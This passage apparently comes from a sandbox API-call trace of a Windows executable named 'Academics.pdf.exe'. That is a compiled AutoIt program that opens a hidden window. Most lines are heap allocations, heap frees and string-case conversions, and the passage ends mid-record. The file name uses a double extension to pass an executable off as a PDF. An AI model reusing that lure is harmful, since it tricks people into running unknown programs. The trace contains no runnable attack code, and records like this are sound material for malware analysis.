hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a408 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c200 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c2e8 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c330 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a438 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c378 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c438 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c480 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a468 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c4c8 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c588 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c5d0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241a498 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c618 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c700 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c748 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241caf8 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c790 | out: hHeap=0x25c0000) returned 1 [0132.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b2c8 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c850 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c898 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241cb28 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c8e0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c9a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241c9e8 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241cb58 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241ca30 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b310 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b358 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241cb88 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b3a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b460 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b4a8 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241cbb8 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b4f0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b5b0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b5f8 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241cbe8 | out: hHeap=0x25c0000) returned 1 [0132.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241b640 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241df38 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241df80 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241cc18 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241dfc8 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241e088 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241e0d0 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241cc48 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x241e118 | out: hHeap=0x25c0000) returned 1 [0132.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24191a0 | out: hHeap=0x25c0000) returned 1 [0132.733] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", nBufferLength=0x104, lpBuffer=0x8bfa80, lpFilePart=0x4a7f50 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFilePart=0x4a7f50*="Academics.pdf.exe") returned 0x37 [0132.734] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0132.734] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A0110005C00", cchLength=0xb | out: lpsz="A0110005C00") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A0110005C00", cchLength=0xb | out: lpsz="A0110005C00") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A2B10104C1C", cchLength=0xb | out: lpsz="A2B10104C1C") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A2B10104C1C", cchLength=0xb | out: lpsz="A2B10104C1C") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A2200004C22_", cchLength=0xc | out: lpsz="A2200004C22_") returned 0xc [0132.735] CharUpperBuffW (in: lpsz="A2200004C22_", cchLength=0xc | out: lpsz="A2200004C22_") returned 0xc [0132.735] CharUpperBuffW (in: lpsz="A2200004C22X_", cchLength=0xd | out: lpsz="A2200004C22X_") returned 0xd [0132.735] CharUpperBuffW (in: lpsz="A2200004C22X_", cchLength=0xd | out: lpsz="A2200004C22X_") returned 0xd [0132.735] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0132.735] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0132.735] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", nBufferLength=0x104, lpBuffer=0x8bf848, lpFilePart=0x8bfa5c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFilePart=0x8bfa5c*="Academics.pdf.exe") returned 0x37 [0132.735] GetSysColorBrush (nIndex=15) returned 0x1100059 [0132.735] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0132.735] LoadIconW (hInstance=0x400000, lpIconName=0x63) returned 0xc0125 [0132.736] LoadIconW (hInstance=0x400000, lpIconName=0xa4) returned 0x201b5 [0132.736] LoadIconW (hInstance=0x400000, lpIconName=0xa2) returned 0x201ad [0132.737] LoadImageW (hInst=0x400000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x201ab [0132.737] RegisterClassExW (param_1=0x8bfa38) returned 0xc121 [0132.737] GetSysColorBrush (nIndex=15) returned 0x1100059 [0132.737] RegisterClassExW (param_1=0x8bf9e0) returned 0xc134 [0132.737] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c1 [0132.738] InitCommonControlsEx (picce=0x8bfa10) returned 1 [0132.739] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0xa9cea8 [0132.740] LoadIconW (hInstance=0x400000, lpIconName=0xa9) returned 0x201a9 [0132.740] ImageList_ReplaceIcon (himl=0xa9cea8, i=-1, hicon=0x201a9) returned 0 [0132.844] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x60122 [0132.844] NtdllDefWindowProc_W () returned 0x0 [0132.844] NtdllDefWindowProc_W () returned 0x1 [0132.845] NtdllDefWindowProc_W () returned 0x0 [0132.947] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0132.947] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c1 [0132.948] CreatePopupMenu () returned 0x600bd [0132.948] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x60122, hMenu=0x1, hInstance=0x400000, lpParam=0x0) returned 0x40120 [0133.132] NtdllDefWindowProc_W () returned 0x0 [0133.132] ShowWindow (hWnd=0x60122, nCmdShow=0) returned 0 [0133.132] ShowWindow (hWnd=0x60122, nCmdShow=0) returned 0 [0133.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d610 [0133.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9a0 [0133.133] CharUpperBuffW (in: lpsz="A2200004C22_", cchLength=0xc | out: lpsz="A2200004C22_") returned 0xc [0133.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d610 | out: hHeap=0x25c0000) returned 1 [0133.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9a0 | out: hHeap=0x25c0000) returned 1 [0133.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498938 [0133.133] PeekMessageW (in: lpMsg=0x8bf7b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7b8) returned 0 [0133.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d610 [0133.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498890 [0133.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9a0 [0133.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498920 [0133.133] RtlSizeHeap (HeapHandle=0x25c0000, Flags=0x0, MemoryPointer=0x25c2a58) returned 0x80 [0133.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249b9b0 [0133.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9b0 | out: hHeap=0x25c0000) returned 1 [0133.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249b9b0 [0133.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9b0 | out: hHeap=0x25c0000) returned 1 [0133.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0133.134] PeekMessageW (in: lpMsg=0x8bf7b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7b8) returned 0 [0133.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498b78 [0133.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9b0 [0133.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498b78 | out: hHeap=0x25c0000) returned 1 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d980 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498b78 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24988f0 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9c0 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498908 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0133.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498908 | out: hHeap=0x25c0000) returned 1 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d9d0 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498908 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498980 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb20 [0133.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498b78 | out: hHeap=0x25c0000) returned 1 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d9f8 [0133.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb30 [0133.135] CharUpperBuffW (in: lpsz="A2200004C22X_", cchLength=0xd | out: lpsz="A2200004C22X_") returned 0xd [0133.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d9f8 | out: hHeap=0x25c0000) returned 1 [0133.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb30 | out: hHeap=0x25c0000) returned 1 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498b78 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0133.136] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb30 [0133.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d9f8 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498950 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb40 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249da20 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb50 [0133.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249da48 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d88 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb60 [0133.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249da70 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb70 [0133.136] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249da70 | out: hHeap=0x25c0000) returned 1 [0133.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb70 | out: hHeap=0x25c0000) returned 1 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x249bb70 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498da0 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb80 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498dd0 [0133.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb80 | out: hHeap=0x25c0000) returned 1 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498de8 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249da70 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e00 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb80 [0133.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e00 | out: hHeap=0x25c0000) returned 1 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249da98 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e00 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e18 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d078 [0133.137] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb90 [0133.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dac0 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e48 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bba0 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dae8 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e60 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbb0 [0133.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e60 | out: hHeap=0x25c0000) returned 1 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249db10 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e60 [0133.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e78 [0133.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dac0 | out: hHeap=0x25c0000) returned 1 [0133.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb90 | out: hHeap=0x25c0000) returned 1 [0133.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.138] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dac0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb90 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e90 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: 